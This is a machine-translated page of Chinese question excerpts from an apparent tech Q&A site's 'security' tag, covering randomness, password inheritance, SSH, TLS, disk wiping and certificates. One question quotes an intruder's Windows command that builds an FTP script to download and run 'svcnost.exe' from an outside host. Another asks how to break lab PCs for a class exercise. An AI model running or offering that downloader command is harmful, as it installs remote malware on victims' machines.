Questions tagged «security»

我从来没有得到这个。只是说您用任何语言编写了一个小程序，都会掷骰子（仅以骰子为例）。经过60万次滚动，每个数字将被滚动100,000次左右，这是我所期望的。 为什么会有专门针对“真正随机性”的网站？当然，根据上述观察，获得任意数字的机会几乎等于可以选择多少个数字。 我在Python中尝试过：这是6000万次滚动的结果。最高变化约为0.15。这不是随机的吗？ 1 - 9997653 2347.0 2 - 9997789 2211.0 3 - 9996853 3147.0 4 - 10006533 -6533.0 5 - 10002774 -2774.0 6 - 9998398 1602.0

665 security  random-number-generator 

我是家里的数字大师。我的妻子擅长于电子邮件和论坛网站，但她信任我所有重要的数字资料，包括网上银行和其他需要密码的内容；以及家庭照片以及现代家庭中大量其他数字事物。我们讨论相关的动作，但执行动作的始终是我。 如果我突然丧失工作能力，那么我的妻子将彻底陷入困境：她不知道我们计算机上的数字内容是什么，如何访问它，我们拥有哪些在线帐户以及他们的登录凭据是什么。这也会使我的许多公开露面（个人网站，电子邮件帐户，社交网络等）无法解决。 使事情复杂化的是，我是谁到处都不使用相同密码的人之一。我会混合使用SuperGenPass和LastPass，并尽可能使用两因素身份验证。我没有太多的希望，她会通过的所有书面说明找到她的方式是在紧张的情况。 我只能告诉她，她应该问我的精通技术的孪生兄弟，然后将我的LastPass主密码短语交给他。我认为这将有很大的成功机会，但这很不雅致，我的妻子无法控制这些信息。 如何确保我的妻子可以使用我的数字遗体？ 更新： 非常感谢您所做的所有巨大贡献。我学到了很多！现在我只需要决定 :-)

363 security  passwords  user-accounts  login  credentials 

好的，因此对于我的PC班，我必须找到3个会弄乱实验室PC的黑客。我和我的搭档将PC弄乱，然后另一个团队将尝试对其进行修复。它的系统是Windows7。任何会停止正常使用或使PC失效的事情。条件： 无法打开外壳 无法使用注册表设置（由于注册表设置太大，其他团队需要很长时间才能解决） 需要在15到30分钟内（由我的老师（最好不要由其他团队提供））是可修复的（意思是，没有什么会导致严重问题，因此需要重新安装） 可以使用管理工具 没有下载（PC甚至没有连接到网络） 注意：通过获取桌面的屏幕快照并将其设置为背景来创建假的，不可点击的桌面之类的操作将无法正常工作，因为已经讨论过了。还讨论了创建重新启动链接并将其放入自动启动程序的问题。但是，任何这种类型的声音都很好听。 有什么建议么？ PS这真的是我上大学的课，所以这里没有害处，只是纯粹的实验室乐趣:) 编辑后添加：首先要感谢大家的输入，这里有一些很棒的想法。为了澄清一些事情：-我有管理员帐户-需要在15分钟内完成，需要在15-30分钟内修复-无法将其连接到任何网络，因为它是实验室PC而大学不允许他们。 @Billare，是的，我们的老师内心深处是黑客：) 哦，顺便说一句，我认为我们不允许从另一种介质引导或与BIOS混淆，它是Desktop Systems Administration类，并且所有操作都需要在Windows内完成。我将询问并查看是否允许，如果可以，那么我可以在这里使用一些想法。再次感谢大家。 编辑2：让我们尝试一个不同的角度。如何禁用一些非重要的服务会引起一些麻烦。要点是，从开始使用PC开始就需要痛苦，而不是长期使用。哇，我的脑海里浮现出一些想法，太棒了，今晚会让您知道我的用意。 主持人注意：如果您建议禁用/损坏计算机的方法，请立即提供有关如何修复损坏的信息的信息（如果不是显而易见的话）。 无法解释其工作方式或作用的单线回答将转换为注释。

302 windows-7  windows  security 

我正在尝试使用设置Ubuntu服务器上的无密码SSH ssh-copy-id myuser@myserver，但出现错误： 警告：“ myserver”的ECDSA主机密钥与IP地址“ 192.168.1.123”的密钥不同 是什么原因造成的，如何解决？我尝试删除.ssh远程计算机上的目录，并在ssh-keygen -R "myserver"本地运行，但这不能解决错误。

287 ssh  security  ubuntu-server  ssh-keys 

如何检索特定网站提供的SSL / TLS密码套件的列表？ 我已经尝试过openssl，但是如果您检查输出： $ echo -n | openssl s_client -connect www.google.com:443 CONNECTED(00000003) depth=1 /C=ZA/O=Thawte Consulting (Pty) Ltd./CN=Thawte SGC CA verify error:num=20:unable to get local issuer certificate verify return:0 --- Certificate chain 0 s:/C=US/ST=California/L=Mountain View/O=Google Inc/CN=www.google.com i:/C=ZA/O=Thawte Consulting (Pty) Ltd./CN=Thawte SGC CA 1 s:/C=ZA/O=Thawte Consulting (Pty) Ltd./CN=Thawte SGC CA i:/C=US/O=VeriSign, …

261 security  ssl  tls 

我下班时使用SSH隧道来绕过各种隐性防火墙（我的老板没关系:)）。问题是，一段时间后，ssh连接通常会挂起，并且隧道断开。 如果我至少可以自动监视隧道，则可以在挂起隧道时重新启动它，但我什至没有想办法。 可以告诉我如何防止ssh连接挂起的用户的加分点，当然！

234 linux  networking  security  ssh  shell 

Windows XP SP2和Windows Vista具有这种处理方式，其中区域信息保留在已下载文件的NTFS分区中，因此它会阻止某些应用程序中的某些文件，直到您“取消阻止”这些文件为止。 因此，例如，如果您下载源代码的zip文件进行尝试，则每个文件都会在文件属性的安全设置中显示该文件 “此文件来自另一台计算机，可能被阻止以帮助保护此计算机” 以及“取消阻止”按钮。某些程序不在乎，但Visual Studio将拒绝在解决方案中加载项目，直到它们被解除阻止为止。 虽然转到每个项目文件并分别解除阻止并不十分困难，但这是一个痛苦。而且它似乎没有显示您可以同时取消阻止多个选定的文件。 有什么方法可以取消阻止目录中的所有文件，而不必单独访问它们？ 我知道您可以全局关闭所有新文件的功能，但是我不想这样做

186 windows  security  ntfs 

大多数热情的用户（即使他们不是专业人士）是否可以使用众所周知的技术来突破普通家用路由器的安全性？ 一些基本的安全选项是： 具有多种加密方法的强大网络密码 自定义路由器访问密码 WPS 没有SSID广播 MAC地址过滤 这些措施是否受到损害？如何使家庭网络更安全？

157 wireless-networking  router  security 

几次我试图在各种Linux机器上更改用户密码，但是当新密码与旧密码相似时，操作系统抱怨它们太相似了。 我一直想知道，系统如何知道这一点？我以为密码另存为哈希。这是否意味着当系统能够比较新密码的相似性时，旧密码实际上被保存为纯文本吗？

145 linux  unix  security 

删除文件后，除非明确用其他内容覆盖，否则文件的内容可能仍保留在文件系统中。该wipe命令可以安全地擦除文件，但似乎不允许擦除任何文件未使用的可用磁盘空间。 我应该使用什么来实现这一目标？

145 linux  ubuntu  security  storage  secure-erase 

当我访问https://1.1.1.1时，我使用的任何Web浏览器都认为该URL是安全的。 这是Google Chrome显示的内容： 通常，当我尝试通过其IP地址访问HTTPS站点时，会收到如下安全警告： 据我了解，站点证书需要与域匹配，但是Google Chrome证书查看器不会显示1.1.1.1： GoDaddy的知识库文章“我可以为Intranet名称或IP地址申请证书吗？” 说： 否-我们不再接受内部网名称或IP地址的证书请求。这是一种行业标准，不是GoDaddy特有的标准。 （重点是我的） 并且： 因此，自2016年10月1日起，证书颁发机构（CA）必须吊销使用 Intranet名称或IP地址的SSL证书。 （重点是我的） 和： 除了保护IP地址和Intranet名称之外，您应该将服务器重新配置为使用完全合格的域名（FQDN），例如www.coolexample.com。 （重点是我的） 强制性撤销日期早于2016年10月01日，但证书1.1.1.1已于2018年3月29日签发（如上图所示）。 所有主要浏览器如何可能认为https://1.1.1.1是受信任的HTTPS网站？

133 security  browser  https  web  ssl-certificate 

假设有人要我将一些文件复制到他们的USB记忆棒中。我正在运行禁用自动运行功能的完整Windows 7 x64（通过组策略）。我插入USB驱动器，在Windows资源管理器中将其打开，然后将一些文件复制到其中。我没有运行或查看任何现有文件。如果我这样做会发生什么不好的事情？ 如果我在Linux（例如Ubuntu）上执行此操作怎么办？ 请注意，我在寻找细节的特定风险（如果有的话），而不是“这将是安全的，如果你不这样做”。

132 windows-7  linux  security  usb-flash-drive  autorun 

我想在Ubuntu 10.04上使用tar命令创建一些tar.gz（可能还有tar.bz2）文件。 我想用密码保护文件。 执行此操作的命令是什么（我已经使用Google搜索过，但是没有发现任何显示如何使用密码创建和提取压缩文件的命令）。 有人知道该怎么做吗？

130 ubuntu  security  tar  gzip  bzip2 

我的家用PC通常是打开的，但显示器却关闭了。今天傍晚，我下班回家后，发现了一次看上去很像黑客尝试的事情：在我的浏览器中，我的Gmail已打开（就是我），但是它处于撰写模式，并且该TO字段中包含以下内容： md / c echo open cCTeamFtp.yi.org 21 >> ik＆echo用户ccteam10 765824 >> ik＆echo二进制文件>> ik＆echo get svcnost.exe >> ik＆echo bye >> ik＆ftp -n -v -s：ik＆del ik ＆svcnost.exe＆exit echo您已拥有 在我看来，这看起来像Windows命令行代码，并且代码的md开头加上Gmail处于撰写模式这一事实，很明显表明有人试图运行cmd命令。我猜我很幸运，实际上我没有在此PC上运行Windows，但是我有其他人可以运行。这是我第一次发生这样的事情。我不是Linux专家，当时我没有运行除Firefox之外的任何其他程序。 我绝对确定我没有写这个，并且没有人在我的电脑前。另外，我最近将自己的Google密码（以及所有其他密码）更改为类似的密码，vMA8ogd7bv所以我认为没有人入侵了我的Google帐户。 刚刚发生了什么？当不是老太婆运行恶意软件的老Windows计算机而不是最近安装的新Ubuntu时，有人如何在我的计算机上敲击键盘？ 更新： 让我解决一些要点和问题： 我在奥地利的乡下。我的WLAN路由器运行WPA2 / PSK以及不在词典中的中等强度密码。必须是蛮力的，距离这里不到50米；它不太可能被黑客入侵。 我使用的是USB有线键盘，因此再也不太可能有人可以入侵它。 当时我没有使用计算机。我在工作时只是在家里闲逛。这是一台安装在显示器上的台式计算机，因此我很少关闭它。 这台机器只有两个月大，只能运行Ubuntu，而且我没有使用奇怪的软件或访问奇怪的网站。主要是Stack Exchange，Gmail和报纸。没有游戏。Ubuntu将保持最新状态。 我不知道正在运行任何VNC服务；我当然还没有安装或启用它。我也没有启动任何其他服务器。我不确定默认情况下是否在Ubuntu中运行任何程序吗？ 我知道Gmail帐户活动中的所有IP地址。我相当确定Google不是入门工具。 我找到了“ 日志文件查看器”，但不知道要查找什么。救命？ 我真正想知道的是，真正让我感到不安全的是：互联网上的任何人如何在我的计算机上生成击键？我如何才能避免这种情况，而不必全神贯注呢？我不是Linux极客，而是父亲，他对Windows迷恋了20多年，对它感到厌倦。在过去的18年多的在线时间里，我从未亲自看到过任何黑客尝试，因此这对我来说是新的。

128 linux  security 

我的计算机上有一个PFX证书文件，我想在导入之前查看详细信息。（导入实用程序实际上不会告诉您证书是什么！）。 如何查看有关PFX证书文件的详细信息？

123 windows  security  certificate  client-certificate